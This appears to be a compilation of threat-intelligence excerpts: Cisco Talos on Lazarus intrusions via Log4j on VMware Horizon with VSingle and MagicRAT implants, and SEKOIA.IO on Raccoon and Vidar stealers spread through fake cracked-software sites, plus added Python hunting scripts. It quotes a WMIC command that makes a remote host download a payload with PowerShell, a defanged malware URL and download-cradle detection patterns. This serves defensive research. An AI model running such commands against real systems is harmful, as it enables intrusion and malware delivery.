Cisco Talos assesses with high confidence that these attacks were conducted by the North Korean state-sponsored threat actor Lazarus Group. During our investigations, we identified three distinct RATs being employed by the threat actors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese CERT (JPCERT/CC) recently published reports (VSingle, YamaBot) describing them in detail and attributed the campaigns to the Lazarus threat actor.

The TTPs used in these attacks also point to the Lazarus threat actor. The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit from web servers. The same initial vector, URL patterns and similar subsequent hands-on-keyboard activity have been described in this report from AhnLab from earlier this year. There are also overlapping IOCs between the campaign described by AhnLab and the current campaign, such as the IP address 84[.]38.133[.]145, which was used as a hosting platform for the actors' malicious tools. Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants at the disposal of Lazarus. Additionally, we've also observed similarities in TTPs disclosed by Kaspersky and attributed to the Andariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware. While Kaspersky discovered the use of Dtrack and Maui, we've observed the use of VSingle, YamaBot and MagicRAT.

Cisco Talos acknowledges that, when analyzed individually, the attribution evidence only reaches medium confidence; however, we're raising our confidence level when analyzing all these points in the context of the campaign and victims.
Once the AV on the system has been bypassed using the reverse shell, the attackers then deploy the actual malware implant from a malware family known to be developed and operated by Lazarus, called "VSingle." The deployment consists of downloading a copy of the legitimate WinRAR utility from a remote location controlled by the attackers, along with an additional payload (archive) [T1608]:
The archive downloaded to the infected endpoint is decompressed and consists of the VSingle malware executable, which is optionally renamed and then persisted on the endpoint by creating an auto-start service.
The implant is simple in terms of functionality and is basically a stager that enables the attackers to deploy more malware on the infected system. It also includes the ability to open a reverse shell that connects to the C2 server and gives the attackers untethered access to the endpoint to execute commands via "cmd.exe." Although a rather simple RAT, VSingle can download and execute additional plugins from the C2 server. These plugins can either be in the form of shellcode or script files of specific formats served by the C2. The image below shows the code used to execute downloaded shellcode.
What's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems. This implant, called "MagicRAT," is outlined in a recently published post. The reverse interactive shell eventually downloads MagicRAT from a remote location.
Once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify that they are reachable (with an occasional tracert). VSingle deployment on new hosts was done by using WMIC to start a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote system [T1608/001]:

WMIC /node: process call create "powershell.exe (New-Object System.Net.Webclient).DownloadFile('/svhostw.exe','\\svhostww.exe')"

In some infections, we observed the deployment of impacket tools on other endpoints to move laterally and establish an interactive shell. This stage of the attacks was clearly manual work performed by a human operator. While trying to establish interactive remote console sessions, we can see the operators making errors in the commands.
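As an added example (not code from the Talos post), the following Python checks constructed Windows process-creation events for both sides of the WMIC-driven deployment described above: the operator host's wmic.exe call with /node: and process call create, and the target host's powershell.exe spawned by WmiPrvSE.exe running a WebClient download. Host names, paths and the 203.0.113.7 download URL are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Hosts, paths and the 203.0.113.7 download URL are placeholders.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'WMIC /node:10.0.0.25 process call create "powershell.exe '
                "(New-Object System.Net.Webclient).DownloadFile("
                "'http://203.0.113.7/svhostw.exe','C:\\svhostww.exe')\""},
    {"host": "srv02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell.exe (New-Object System.Net.Webclient).DownloadFile("
                "'http://203.0.113.7/svhostw.exe','C:\\svhostww.exe')"},
    {"host": "ws03", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "WMIC os get caption"},
    {"host": "srv04", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

# wmic.exe aimed at a remote node and asked to create a process.
WMIC_REMOTE = re.compile(r"\bwmic(?:\.exe)?\b.*?/node:\S*\s.*?\bprocess\s+call\s+create\b", re.I)
# WebClient download cradle as used in the deployment command.
PS_DOWNLOAD = re.compile(r"\.(?:DownloadFile|DownloadString)\s*\(", re.I)

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the list of detection tags that apply to one process-creation event."""
    image, parent, cmd = _basename(event["image"]), _basename(event["parent"]), event["cmdline"]
    tags = []
    if image == "wmic.exe" and WMIC_REMOTE.search(cmd):
        tags.append("wmic_remote_process_create")       # seen on the operator's source host
        if PS_DOWNLOAD.search(cmd):
            tags.append("remote_powershell_download_cradle")
    if image == "powershell.exe" and parent == "wmiprvse.exe":
        tags.append("powershell_spawned_by_wmi")         # seen on the target host
        if PS_DOWNLOAD.search(cmd):
            tags.append("wmi_launched_download_cradle")
    return tags

def hunt_process_events(events):
    """Return (host, tags) for every event that raised at least one tag."""
    return [(e["host"], classify(e)) for e in events if classify(e)]
```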
Across the first endpoints compromised in the enterprises, we observed the attackers downloading their custom implants from remote locations and deploying and persisting them on the systems.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Information stealer (or infostealer) is a malware family designed to gather and exfiltrate sensitive information from the infected host. This threat has become widespread over the past few years and is increasingly distributed by multiple threat actors from the cybercrime ecosystem. The distribution methods used to spread stealers are varied, ranging from malspam to fake installers. As observed by SEKOIA.IO, most infection chains leverage social engineering techniques to lure victims into downloading and executing the malicious payloads.
A common scheme to trick the victim is a tutorial that demonstrates how to install cracked software, which turns out to be an information stealer. For the distribution method, the victim reaches a malicious website that is either promoted through a Google Ad, SEO poisoned (Search Engine Optimization), or shared in a legitimate community space. To assist the victim in compromising their own system, the tutorial often describes step by step how to disable the antivirus software, download the fake installer and run it.
SEKOIA.IO analysts unveiled a large and resilient infrastructure used to distribute the Raccoon and Vidar stealers, likely since early 2020. The associated infection chain, leveraging this infrastructure of over 250 domains, uses about a hundred fake cracked-software catalogue websites that redirect through several links before downloading the payload hosted on file-sharing platforms such as GitHub. This blogpost aims to present the current infection chain, payloads and the whole infrastructure tracked by SEKOIA.IO. We will contact the services abused by the intrusion set to forward the domain names and accounts used for malicious activities.
This webpage contains information on the legitimate Adobe Photoshop software, which helps gain the trust of potential victims. It also contains dozens of URLs redirecting to other pages of this website, as well as to the legitimate Adobe website or other platforms, including YouTube. This improves the website's indexing in search engines (SEO poisoning technique). The content of the webpages ends with a tutorial demonstrating how to install the cracked version of the software, and several download buttons redirecting the user to step 2.
Following the Cuttly short link redirects the user to the download page of an archive hosted on the legitimate file-sharing platform GitHub: hxxps://raw.githubusercontent[.]com/davids1a/soulmate/main/NewInstaller_1234_FullVersion_B4.rar
More importantly, this blogpost highlights the potential risks of downloading cracked software, a very common social engineering technique used to install malware. We highly recommend only downloading and installing software from trusted, official websites. Beyond the indicators of compromise, detection teams can hunt for infection chains leveraging fake cracked software by searching for weak signals, such as communications to unusual TLDs and to URLs containing IP addresses, or by looking for suspicious file names.
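An added example, not part of the SEKOIA.IO post: a small Python hunt over constructed proxy log lines for the weak signals named above, namely IP-literal hosts, uncommon TLDs and installer-style archive names. The allowlist of common TLDs, the log line format, the 203.0.113.7 address and the example-user/repo path are assumptions.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumed allowlist of TLDs considered ordinary for this environment; tune per organisation.
COMMON_TLDS = {"com", "org", "net", "edu", "gov", "io", "co", "uk", "de", "fr"}
# Installer/crack-style file names ending in an archive or executable extension.
SUSPICIOUS_NAME = re.compile(
    r"(?:installer|setup|crack|keygen|patch|fullversion|activat)\w*\.(?:rar|zip|7z|exe)$", re.I)
ARCHIVE_EXT = re.compile(r"\.(?:rar|zip|7z)$", re.I)

# Constructed proxy log lines: timestamp, client IP, method, URL (not real traffic).
SAMPLE_PROXY_LOG = """\
2024-01-01T10:00:00Z 10.0.0.5 GET https://raw.githubusercontent.com/example-user/repo/main/NewInstaller_1234_FullVersion_B4.rar
2024-01-01T10:00:03Z 10.0.0.5 GET http://203.0.113.7/svhostw.exe
2024-01-01T10:00:10Z 10.0.0.8 GET https://crack-soft.xyz/photoshop-2023-free/
2024-01-01T10:01:00Z 10.0.0.9 GET https://www.example.com/docs/report.pdf
"""

def refang(url):
    """Turn a defanged indicator (hxxps, [.]) back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")

def weak_signals(url):
    """Return the weak signals present in one URL (empty list if none)."""
    parts = urlsplit(refang(url))
    host = parts.hostname or ""
    signals = []
    try:
        ipaddress.ip_address(host)          # host is a bare IP literal
        signals.append("ip_literal_host")
    except ValueError:
        tld = host.rsplit(".", 1)[-1].lower()
        if tld and tld not in COMMON_TLDS:
            signals.append(f"unusual_tld:{tld}")
    filename = parts.path.rsplit("/", 1)[-1]
    if SUSPICIOUS_NAME.search(filename):
        signals.append("suspicious_filename")
    elif ARCHIVE_EXT.search(filename):
        signals.append("archive_download")
    return signals

def hunt_proxy_log(log_text):
    """Return (client, url, signals) for each log line that shows at least one signal."""
    hits = []
    for line in log_text.splitlines():
        _ts, client, _method, url = line.split()
        signals = weak_signals(url)
        if signals:
            hits.append((client, url, signals))
    return hits
```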